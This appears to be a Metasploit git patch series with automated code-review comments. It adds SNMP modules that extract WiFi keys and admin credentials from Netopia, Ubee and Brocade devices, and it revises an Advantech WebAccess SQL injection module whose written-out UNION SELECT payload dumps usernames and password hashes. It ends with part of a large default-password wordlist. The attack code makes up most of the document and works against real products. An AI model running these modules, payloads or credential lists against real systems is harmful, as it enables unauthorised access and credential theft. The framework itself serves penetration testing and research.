+ loot_name = "brocade.hashes"
+ loot_type = "text/plain"
+ loot_filename = "brocade_hashes.txt"
+ loot_desc = "Brodace username and password hashes"
+ p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)
+
+ print_status("Credentials saved: #{p}")
+ rescue ::SNMP::UnsupportedVersion
+ rescue ::SNMP::RequestTimeout
+ rescue ::Interrupt
+ raise $!
+ rescue ::Exception => e
+ print_error("#{ip} error: #{e.class} #{e}")
+ disconnect_snmp
+ end
+ end
+end
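Review bot: In `run_host` of `brocade_enumhash.rb` the credential loop and the `store_loot` call sit after the `if snmp.get_value('sysDescr.0') =~ /Brocade/` block rather than inside it, so a host that does not match reaches `@users.each_index` with `@users` unset and the resulting `NoMethodError` is reported through the broad `rescue ::Exception`. `disconnect_snmp` is called only on that error path, so a successful run appears to leave the SNMP session open. I would add the guard `return unless snmp.get_value('sysDescr.0') =~ /Brocade/`, move `disconnect_snmp` under an `ensure`, and presumably pass `ip` rather than `datastore['RHOST']` to `store_loot`. The `netopia_enum.rb` and `ubee_ddw3611.rb` hunks in this commit share the same structure (there `wifiinfo` can be unset when `store_loot` runs). The loot description also has a typo, `Brodace`.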
diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb
new file mode 100644
index 0000000000..44f87f1508
--- /dev/null
+++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb
@@ -0,0 +1,102 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::SNMPClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Netopia 3347 Cable Modem Wifi Enumeration', + 'Description' => %q{ + This module extracts WEP keys and WPA preshared keys from + certain Netopia cable modems. + }, + 'References' => + [ + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ] + ], + 'Author' => ['Deral "PercentX" Heiland'], + 'License' => MSF_LICENSE + ) + + end + + def run_host(ip) + output_data = {} + begin + snmp = connect_snmp + + if snmp.get_value('sysDescr.0') =~ /Netopia 3347/ + + wifistatus = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.1.0') + if wifistatus == "1" + wifiinfo = "" + ssid = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.2.1') + print_good("#{ip}") + print_good("SSID: #{ssid}") + wifiinfo << "SSID: #{ssid}" << "\n" + + wifiversion = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.4.1') + if wifiversion == "1" + + #Wep enabled + elsif wifiversion == ("2"||"3") + wepkey1 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.1') + print_good("WEP KEY1: #{wepkey1}") + wifiinfo << "WEP KEY1: #{wepkey1}" << "\n" + wepkey2 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.2') + print_good("WEP KEY2: #{wepkey2}") + wifiinfo << "WEP KEY2: #{wepkey2}" << "\n" + wepkey3 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.3') + print_good("WEP KEY3: #{wepkey3}") + wifiinfo << "WEP KEY3: #{wepkey3}" << "\n" + wepkey4 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.4') + print_good("WEP KEY4: #{wepkey4}") + wifiinfo << "WEP KEY4: #{wepkey4}" << "\n" + actkey = 
snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.13.0') + print_good("Active Wep key is Key#{actkey}") + wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n" + + #WPA enabled + elsif wifiversion == "4" + print_line("Device is configured for WPA ") + wpapsk = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1') + print_good("WPA PSK: #{wpapsk}") + wifiinfo << "WPA PSK: #{wpapsk}" << "\n" + + #WPA Enterprise enabled + elsif wifiversion == "5" + print_line("Device is configured for WPA enterprise") + else + print_line("FAILED") + end + + else + print_line("WIFI is not enabled") + end + end + #Woot we got loot. + loot_name = "netopia_wifi" + loot_type = "text/plain" + loot_filename = "netopia_wifi.txt" + loot_desc = "Netopia Wifi configuration data" + p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc) + print_status("WIFI Data saved: #{p}") + + rescue ::SNMP::UnsupportedVersion + rescue ::SNMP::RequestTimeout + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("#{ip} error: #{e.class} #{e}") + disconnect_snmp + end + end +end diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb new file mode 100644 index 0000000000..68a59454ac --- /dev/null +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb 
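Review bot: `elsif wifiversion == ("2"||"3")` in `netopia_enum.rb` only ever compares against `"2"`, because `"2"||"3"` evaluates to its first operand; a value of `"3"` falls through to the final `else` and prints `FAILED`. `elsif %w[2 3].include?(wifiversion)` is what the condition appears to intend. The preceding `if wifiversion == "1"` branch has an empty body, so it is worth a comment stating what `"1"` means and that nothing is reported for it. `output_data = {}` is assigned and never used.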
@@ -0,0 +1,159 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::SNMPClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Ubee DDW3611b Cable Modem Wifi Enumeration', + 'Description' => %q{ + This module will extract WEP keys and WPA preshared keys from + certain Ubee cable modems. + }, + 'References' => + [ + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ] + ], + 'Author' => ['Deral "PercentX" Heiland'], + 'License' => MSF_LICENSE + ) + + end + + def run_host(ip) + output_data = {} + begin + snmp = connect_snmp + + if snmp.get_value('1.2.840.10036.2.1.1.9.12') =~ /DDW3611/ + print_good("#{ip}") + wifiinfo = "" + + # System user account and Password + username = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0') + print_good("Username: #{username}") + wifiinfo << "Username: #{username}" << "\n" + password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0') + print_good("Password: #{password}") + wifiinfo << "Password: #{password}" << "\n" + + wifistatus = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12') + if wifistatus == 1 + ssid = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12') + print_good("SSID: #{ssid}") + wifiinfo << "SSID: #{ssid}" << "\n" + + #Wifi Security Version + wifiversion = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.5.12') + if wifiversion == "0" + print_line("Open Access Wifi is Enabled") + + #Wep enabled + elsif wifiversion == "1" + weptype = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.2.12') + if weptype == "2" + wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.1') + key1 = "#{wepkey1}".unpack('H*') + print_good("WEP 
KEY1: #{key1}") + wifiinfo << "WEP KEY1: #{key1}" << "\n" + wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.2') + key2 = "#{wepkey2}".unpack('H*') + print_good("WEP KEY2: #{key2}") + wifiinfo << "WEP KEY2: #{key2}" << "\n" + wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.3') + key3 = "#{wepkey3}".unpack('H*') + print_good("WEP KEY3: #{key3}") + wifiinfo << "WEP KEY3: #{key3}" << "\n" + wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.4') + key4 = "#{wepkey4}".unpack('H*') + print_good("WEP KEY4: #{key4}") + wifiinfo << "WEP KEY4: #{key4}" << "\n" + actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12') + print_good("Active Wep key is #{actkey}") + wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n" + + elsif weptype == "1" + wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.1') + key1 = "#{wepkey1}".unpack('H*') + print_good("WEP KEY1: #{key1}") + wifiinfo << "WEP KEY1: #{key1}" << "\n" + wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.2') + key2 = "#{wepkey2}".unpack('H*') + print_good("WEP KEY2: #{key2}") + wifiinfo << "WEP KEY2: #{key2}" << "\n" + wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.3') + key3 = "#{wepkey3}".unpack('H*') + print_good("WEP KEY3: #{key3}") + wifiinfo << "WEP KEY3: #{key3}" << "\n" + wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.4') + key4 = "#{wepkey4}".unpack('H*') + print_good("WEP KEY4: #{key4}") + wifiinfo << "WEP KEY4: #{key4}" << "\n" + actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12') + print_good("Active Wep key is #{actkey}") + wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n" + + else + print_line("FAILED") + end + + #WPA enabled + elsif wifiversion == "2" + print_line("Device is configured for WPA ") + wpapsk = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12') + print_good("WPA PSK: #{wpapsk}") + wifiinfo << "WPA PSK: #{wpapsk}" 
<< "\n" + + #WPA2 enabled + elsif wifiversion == "3" + print_line("Device is configured for WPA2") + wpapsk2 = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12') + print_good("WPA2 PSK: #{wpapsk2}") + wifiinfo << "WPA PSK: #{wpapsk2}" << "\n" + + #WPA Enterprise enabled + elsif wifiversion == "4" + print_line("Device is configured for WPA enterprise") + + #WPA2 Enterprise enabled + elsif wifiversion == "5" + print_line("Device is configured for WPA2 enterprise") + + #WEP 802.1x enabled + elsif wifiversion == "6" + print_line("Device is configured for WEP 802.1X") + + else + print_line("FAILED") + end + + else + print_line("WIFI is not enabled") + end + end + #Woot we got loot. + loot_name = "ubee_wifi" + loot_type = "text/plain" + loot_filename = "ubee_wifi.txt" + loot_desc = "Ubee Wifi configuration data" + p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc) + print_status("WIFI Data saved: #{p}") + + rescue ::SNMP::UnsupportedVersion + rescue ::SNMP::RequestTimeout + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_error("#{ip} error: #{e.class} #{e}") + disconnect_snmp + end + end +end From c9465a892282e049943c71dae4f5e3ef1fe36421 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 08:57:59 -0500 Subject: [PATCH 322/853] Rescue when the recovered info is in a format we can't understand --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 88bb7830ba..e5475ed0a7 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb 
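Review bot: `key1 = "#{wepkey1}".unpack('H*')` in `ubee_ddw3611.rb` returns a one-element Array, so `"WEP KEY1: #{key1}"` prints and stores the key wrapped as `["…"]`; the same applies to `key2` through `key4` in both `weptype` branches. Taking the element, `key1 = wepkey1.to_s.unpack('H*').first`, gives the plain hex string. The two `weptype` branches differ only in the OID prefix and could share one loop over key indexes 1 to 4. `wifistatus == 1` compares against an Integer while every other SNMP value in the hunk is compared with a String, so confirm which type `get_value` returns for that OID; the WPA2 branch also labels its loot line `WPA PSK`.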
@@ -164,7 +164,13 @@ class Metasploit3 < Msf::Auxiliary ) for i in 0..@users.length - 1 - @plain_passwords[i] = decrypt_password(@enc_passwords[i], @keys[i]) + @plain_passwords[i] = + begin + decrypt_password(@enc_passwords[i], @keys[i]) + rescue + "(format not recognized)" + end + @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? report_auth_info({ :host => rhost, From ea38a2c6e5685e6733fa4a29020b6133b5963629 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 11:11:58 -0500 Subject: [PATCH 323/853] Handle ISO-8859-1 special chars --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index e5475ed0a7..69c8d661fe 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -172,6 +172,15 @@ class Metasploit3 < Msf::Auxiliary end @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? + + begin + @plain_passwords[i].encode("ISO-8859-1").to_s + rescue Encoding::UndefinedConversionError + chars = @plain_passwords[i].unpack("C*") + @plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}" + @plain_passwords[i] << " (ISO-8859-1 hex chars)" + end + report_auth_info({ :host => rhost, :port => rport, @@ -184,6 +193,7 @@ class Metasploit3 < Msf::Auxiliary users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end + print_status("#{users_table.inspect}") print_line(users_table.to_s) end From 883d2f14b51c9e29f769c0df7660d314bfb41f87 Mon Sep 17 00:00:00 2001 
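Review bot: The bare `rescue` added around `decrypt_password` catches every StandardError and replaces the result with the display string `"(format not recognized)"`, which is still in `@plain_passwords[i]` when the `report_auth_info` call below runs, so a placeholder can be stored as if it were a recovered password. I would keep the placeholder for the table only, skip reporting when decryption failed, and log the cause, e.g. `rescue ::StandardError => e` followed by `vprint_error("#{peer} - decrypt failed: #{e.class} #{e}")`. The same applies to `"(blank password)"` in this hunk and to the hex rewrite added by the next patch's `@@ -172,6 +172,15 @@` hunk. The loop and the `report_auth_info` call continue outside the hunk, so how `:pass` is filled is inferred from the later hunks of this series.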
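Review bot: The probe `@plain_passwords[i].encode("ISO-8859-1").to_s` in the `@@ -172,6 +172,15 @@` hunk rescues only `Encoding::UndefinedConversionError`, but `String#encode` can also raise `Encoding::InvalidByteSequenceError` when the string holds bytes that are invalid in its own encoding, and that would abort the loop for the remaining users. Which of the two is raised depends on the encoding tag of what `decrypt_password` returns, which the hunk does not show, so rescuing both is the safe form: `rescue Encoding::UndefinedConversionError, Encoding::InvalidByteSequenceError`. The encoded result is discarded, so a short comment would help the next reader, e.g. `# probe only: raises if the password is not representable in ISO-8859-1`.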
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 11:13:03 -0500 Subject: [PATCH 324/853] delete debug print_status --- .../auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 69c8d661fe..1b8b6b7e53 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -193,7 +193,6 @@ class Metasploit3 < Msf::Auxiliary users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end - print_status("#{users_table.inspect}") print_line(users_table.to_s) end From 4143474da93031b4703d4535ff452e32c85651e5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 11:47:01 -0500 Subject: [PATCH 325/853] Add support for web databases --- .../advantech_webaccess_dbvisitor_sqli.rb | 36 ++++++++----------- 1 file changed, 15 insertions(+), 21 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 1b8b6b7e53..5d8d7b7886 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -18,8 +18,8 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious - requests to the ChartThemeConfig web service. This module can be used to extract the BEMS - site usernames and hashes. + requests to the ChartThemeConfig web service. This module can be used to extract the site + and projects usernames and hashes. }, 'References' => [ 
@@ -40,7 +40,8 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']) + OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']), + OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"]) ], self.class) end @@ -98,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary Msf::Exploit::CheckCode::Vulnerable end - def parse_users(xml, mark) + def parse_users(xml, mark, separator) doc = Document.new(xml) strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text) @@ -111,13 +112,7 @@ class Metasploit3 < Msf::Auxiliary i = 0 strings.each do |result| next if result == mark - if i < (strings_length / 3) - @users.push(result) - elsif i < (strings_length / 3) * 2 - @enc_passwords.push(result) - else - @keys.push(result) - end + @users << result.split(separator) i = i + 1 end 
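Review bot: `@users << result.split(separator)` in the `@@ -111,13 +112,7 @@` hunk stores however many fields the response row yields, and nothing checks the count before the later hunks index `@users[i][1]` and `@users[i][2]`. `String#split` without a limit also drops trailing empty fields, so a row with an empty last column comes back one element short and is only noticed as a failed decrypt. I would validate at the parse step: `fields = result.split(separator, -1)`, then `next unless fields.length == 3`, then `@users << fields`. The counter `i` (`i = 0` … `i = i + 1`) is no longer read after this change and can be removed. `parse_users` starts above this hunk and ends below it.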
@@ -127,13 +122,14 @@ class Metasploit3 < Msf::Auxiliary print_status("#{peer} - Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) + separator = Rex::Text.rand_text_alpha(5 + rand(5)) # While installing I can only configure an Access backend, but # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName from BAUser where #{rand}=#{rand} " - injection << "union all select Password from BAUser where #{rand}=#{rand} " - injection << "union all select Password2 from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -143,12 +139,10 @@ class Metasploit3 < Msf::Auxiliary end @users = [] - @enc_passwords = [] - @keys = [] @plain_passwords = [] print_status("#{peer} - Parsing extracted data...") - parse_users(data, mark) + parse_users(data, mark, separator) if @users.empty? print_error("#{peer} - Users not found") @@ -166,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary for i in 0..@users.length - 1 @plain_passwords[i] = begin - decrypt_password(@enc_passwords[i], @keys[i]) + decrypt_password(@users[i][1], @users[i][2]) rescue "(format not recognized)" end 
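Review bot: The added `separator = Rex::Text.rand_text_alpha(5 + rand(5))` calls `Kernel#rand` on the line right after the local `rand = Rex::Text.rand_text_numeric(2)` is assigned, so the same name is a method call here and a string in the `#{rand}=#{rand}` interpolations below. Ruby resolves `rand(5)` as the method because of the argument list, so this works, but it reads like a bug. Renaming the local, e.g. `rand_num = Rex::Text.rand_text_numeric(2)` with `#{rand_num}` in the interpolations, removes the ambiguity. The method starts above the hunk.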
@@ -184,13 +178,13 @@ class Metasploit3 < Msf::Auxiliary report_auth_info({ :host => rhost, :port => rport, - :user => @users[i], + :user => @users[i][0], :pass => @plain_passwords[i], :type => "password", :sname => (ssl ? "https" : "http"), - :proof => "Leaked encrypted password: #{@enc_passwords[i]}:#{@keys[i]}" + :proof => "Leaked encrypted password: #{@users[i][1]}:#{@users[i][2]}" }) - users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] + users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i]] end print_line(users_table.to_s) From 2012d41b3d21cd524b03651b7e6d954f1f08ba90 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 13:51:42 -0500 Subject: [PATCH 326/853] Add origin of the user, and mark web users --- .../advantech_webaccess_dbvisitor_sqli.rb | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 5d8d7b7886..4812b2a232 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb 
@@ -127,9 +127,9 @@ class Metasploit3 < Msf::Auxiliary # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from BAUser where #{rand}=#{rand} " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " - injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " + injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, - 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password'] + 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin'] ) for i in 0..@users.length - 1 
@@ -182,14 +182,25 @@ class Metasploit3 < Msf::Auxiliary :pass => @plain_passwords[i], :type => "password", :sname => (ssl ? "https" : "http"), - :proof => "Leaked encrypted password: #{@users[i][1]}:#{@users[i][2]}" + :proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}" }) - users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i]] + + users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])] end print_line(users_table.to_s) end + def user_type(database) + user_type = database + + unless database == "BAUser" + user_type << " (Web Access)" + end + + user_type + end + def decrypt_password(password, key) recovered_password = recover_password(password) recovered_key = recover_key(key) From d2ebab09aa267939a663a6b2fe80b9f0dae89774 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 16 May 2014 15:42:46 -0500 Subject: [PATCH 327/853] Add timeout for SSL renegotiation after migrating [SeeRM #8794] --- lib/rex/post/meterpreter/client_core.rb | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index a48b513825..b10c26ea90 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -266,7 +266,7 @@ class ClientCore < Extension end # Send the migration request (bump up the timeout to 60 seconds) - response = client.send_request( request, 60 ) + client.send_request( request, 60 ) if client.passive_service # Sleep for 5 seconds to allow the full handoff, this prevents 
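Review bot: In the new `user_type` method, `user_type = database` does not copy the string, so `user_type << " (Web Access)"` appends to the caller's object, here `@users[i][3]`. In this hunk `:proof` is built before `user_type` is called, so the output is still right, but any later read of `@users[i][3]` sees the suffixed value, and a second call on the same row appends the suffix again. Build a new string instead: `database == "BAUser" ? database : "#{database} (Web Access)"`. The local also shadows the method name, which the one-line form avoids.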
@@ -282,12 +282,25 @@ class ClientCore < Extension # Now communicating with the new process ### - # Renegotiate SSL over this socket - client.swap_sock_ssl_to_plain() - client.swap_sock_plain_to_ssl() + # If renegotiation takes longer than a minute, it's a pretty + # good bet that migration failed and the remote side is hung. + # Since we have the comm_mutex here, we *must* release it to + # keep from hanging the packet dispatcher thread, which results + # in blocking the entire process. See Redmine #8794 + begin + Timeout.timeout(60) do + # Renegotiate SSL over this socket + client.swap_sock_ssl_to_plain() + client.swap_sock_plain_to_ssl() + end + rescue TimeoutError + client.alive = false + return false + end # Restart the socket monitor client.monitor_socket + end end From af82ae262cbe9d49feb679a43a984c6e7cfbdbb3 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Fri, 16 May 2014 23:27:18 +0200 Subject: [PATCH 328/853] Added a large default password list for services. --- .../default_passwords_large_unhash.txt | 1787 +++++++++++++++++ 1 file changed, 1787 insertions(+) create mode 100644 data/wordlists/default_passwords_large_unhash.txt diff --git a/data/wordlists/default_passwords_large_unhash.txt b/data/wordlists/default_passwords_large_unhash.txt new file mode 100644 index 0000000000..ff0458f94b --- /dev/null +++ b/data/wordlists/default_passwords_large_unhash.txt 
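Review bot: `rescue TimeoutError` relies on the top-level alias of `Timeout::Error`, which later Ruby versions deprecate and then drop; `rescue ::Timeout::Error` names the class that `Timeout.timeout` raises. The timeout path also sets `client.alive = false` and returns `false` without a log line, so a later review of the session cannot tell a hung renegotiation from any other failure; a line such as `elog("Timed out renegotiating SSL after migration")` before `return false` would record it. Whether callers check for the new `false` return is not visible here, since the method starts above the hunk.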
@@ -0,0 +1,1787 @@ +admin admin + +admin + admin +admin password +admin 1234 +root +Administrator admin +admin epicrouter +sysadm sysadm + 1234 + password + access +root root +tech tech + smcadmin + 0 +Administrator +root pass + system +root admin + PASSWORD + Symbol +operator +guest guest +admin bintec +security security +guest +debug synnet +manager manager + adtran +admin motorola +service smile + cascade +admin 0 +!root +user password + BRIDGE +netman netman +super super +admin switch +admin setup +admin changeme +diag switch +operator operator +user user +user +Cisco Cisco +Manager Manager +DTA TJM +apc apc +tech + cisco +User +root 1234 +Admin + letmein +cablecom router +adm +wradmin trancell + ascend +manager friend + NetICs +root blender +netscreen netscreen + sysadm + SKY_FOX +sa + public + Master +setup setup +root default + laflaf +cmaker cmaker +enable +MICRO RSX +login admin + Posterie +write private +root attack +monitor monitor + private + xdfk9874t3 +netopia netopia + Col2ogro2 +admin microbusiness +op op +adminview OCS +op operator +admin secure +admin atlantis +sysadmin sysadmin +super 5777364 +echo echo +craft +adm cascade +admin default +maint maint +comcast 1234 +CSG SESAME +diag danger +readonly lucenttech2 +admin operator +Manager +debug d.e.b.u.g +admin hello + SYSTEM +root ascend +root calvin +manuf xxyyzz +cusadmin highspeed +admin 123 +smc smcadmin +admin Sharp +root password +sweex mysweex +disttech 4tas +su super +admin system +root changeme +poll tech +sysadmin password +SYSDBA masterkey +anonymous + 0000 +root permit +admin barricade +support support +root tslinux +admin hp.com +recovery recovery +USERID PASSW0RD +eng engineer +administrator administrator +admin pwp +admin isee +NETWORK NETWORK +JDE JDE +admin superuser +Guest + Super +admin admin123 +super surt +rwa rwa +admin 123456 +admin NetCache + ADTRAN +USER USER +test test +admin extendnet +admin ironport +lp lp + Cisco +administrator +admin 1111 +sysadmin PASS +ro ro +admin 
